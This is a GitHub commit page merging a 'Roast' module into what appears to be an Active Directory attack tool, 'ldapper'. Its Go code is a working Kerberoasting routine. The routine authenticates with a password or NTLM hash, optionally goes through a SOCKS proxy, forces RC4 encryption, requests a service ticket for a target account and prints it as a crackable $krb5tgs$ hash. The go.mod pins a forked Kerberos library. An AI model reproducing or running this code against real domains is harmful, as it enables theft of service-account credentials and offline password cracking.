-
Notifications
You must be signed in to change notification settings - Fork 14
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #5 from mfdooom/roast
Roast Module
- Loading branch information
Showing
5 changed files
with
153 additions
and
15 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,91 @@ | ||
package Commands | ||
|
||
import ( | ||
"fmt" | ||
"strings" | ||
"encoding/hex" | ||
"github.com/jcmturner/gokrb5/v8/config" | ||
"github.com/jcmturner/gokrb5/v8/client" | ||
"github.com/jcmturner/gokrb5/v8/iana/etypeID" | ||
"log" | ||
"os" | ||
) | ||
|
||
|
||
// dont really like this string for the config | ||
// would rather just create a new config and make changes via functions | ||
// would be easier to read | ||
// cant seem to figure out how to add a [realm] though | ||
const ( | ||
libdefault = `[libdefaults] | ||
default_realm = %s | ||
dns_lookup_realm = false | ||
dns_lookup_kdc = false | ||
ticket_lifetime = 24h | ||
renew_lifetime = 5 | ||
forwardable = yes | ||
proxiable = true | ||
default_tkt_enctypes = rc4-hmac | ||
default_tgs_enctypes = rc4-hmac | ||
noaddresses = true | ||
udp_preference_limit=1 | ||
[realms] | ||
%s = { | ||
kdc = %s:88 | ||
default_domain = %s | ||
}` | ||
) | ||
|
||
func RequestSPN(targetUser string, username string, password string, ntlm string, domain string, dc string, socksServer string, socksType int) (spnResult string) { | ||
|
||
var cl *client.Client | ||
var ticket string | ||
|
||
// Need domain in uppercase for GOKRB5 Config | ||
domain = strings.ToUpper(domain) | ||
|
||
l := log.New(os.Stderr, "GOKRB5 Client: ", log.Ldate|log.Ltime|log.Lshortfile) | ||
|
||
c, err := config.NewFromString(fmt.Sprintf(libdefault, domain, domain, dc, domain)) | ||
|
||
if err != nil { | ||
l.Fatalf("Error Loading Config: %v\n", err) | ||
} | ||
|
||
// Create a Kerberos client with either password or hash | ||
if password != ""{ | ||
cl = client.NewWithPassword(username, domain, password, c, client.DisablePAFXFAST(true), client.AssumePreAuthentication(false)) | ||
}else if ntlm != ""{ | ||
cl = client.NewWithHash(username, domain, ntlm, c, client.DisablePAFXFAST(true), client.AssumePreAuthentication(false)) | ||
} | ||
|
||
// Add socks info to client config if enabled | ||
if socksServer != "" { | ||
cl.Config.Socks.Enabled = true | ||
cl.Config.Socks.Version = socksType | ||
cl.Config.Socks.Server = socksServer | ||
} | ||
|
||
err = cl.Login() | ||
if err != nil { | ||
l.Fatalf("Erron on AS_REQ: %v\n", err) | ||
} | ||
|
||
tgt, _, err := cl.GetServiceTicket(targetUser) | ||
|
||
// only printing out RC4 encrypted tickets currently | ||
if err != nil { | ||
l.Printf("Error getting service ticket: %v\n", err) | ||
}else if tgt.EncPart.EType == etypeID.RC4_HMAC { | ||
checksumHex := make([]byte, hex.EncodedLen(len(tgt.EncPart.Cipher[:16]))) | ||
hex.Encode(checksumHex, tgt.EncPart.Cipher[:16]) | ||
|
||
cipherHex := make([]byte, hex.EncodedLen(len(tgt.EncPart.Cipher[16:]))) | ||
hex.Encode(cipherHex, tgt.EncPart.Cipher[16:]) | ||
ticket = fmt.Sprintf("$krb5tgs$%d$*%s$%s$%s*$%s$%s\n", tgt.EncPart.EType, tgt.SName.NameString[0], tgt.Realm, tgt.SName.NameString[0], checksumHex, cipherHex) | ||
}else if tgt.EncPart.EType != etypeID.RC4_HMAC { | ||
// Don't belive this would happen becuase we only offer rc4 encrpytion based on our config | ||
l.Printf("Invalid encryption type") | ||
} | ||
return ticket | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,23 @@ | ||
module ldapper | ||
|
||
require ( | ||
github.com/go-ldap/ldap/v3 v3.4.4 | ||
github.com/jcmturner/gokrb5/v8 v8.4.3 | ||
github.com/mazen160/go-random v0.0.0-20210308102632-d2b501c85c03 | ||
golang.org/x/text v0.3.7 | ||
h12.io/socks v1.0.3 | ||
) | ||
|
||
require ( | ||
github.com/Azure/go-ntlmssp v0.0.0-20220621081337-cb9428e4ac1e // indirect | ||
github.com/go-asn1-ber/asn1-ber v1.5.4 // indirect | ||
github.com/hashicorp/go-uuid v1.0.3 // indirect | ||
github.com/jcmturner/aescts/v2 v2.0.0 // indirect | ||
github.com/jcmturner/dnsutils/v2 v2.0.0 // indirect | ||
github.com/jcmturner/gofork v1.7.6 // indirect | ||
github.com/jcmturner/rpc/v2 v2.0.3 // indirect | ||
golang.org/x/crypto v0.0.0-20220722155217-630584e8d5aa // indirect | ||
golang.org/x/net v0.0.0-20220725212005-46097bf591d3 // indirect | ||
) | ||
|
||
replace github.com/jcmturner/gokrb5/v8 => github.com/mfdooom/gokrb5/v8 v8.4.3-0.20220811043259-08c37c0bdf17 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters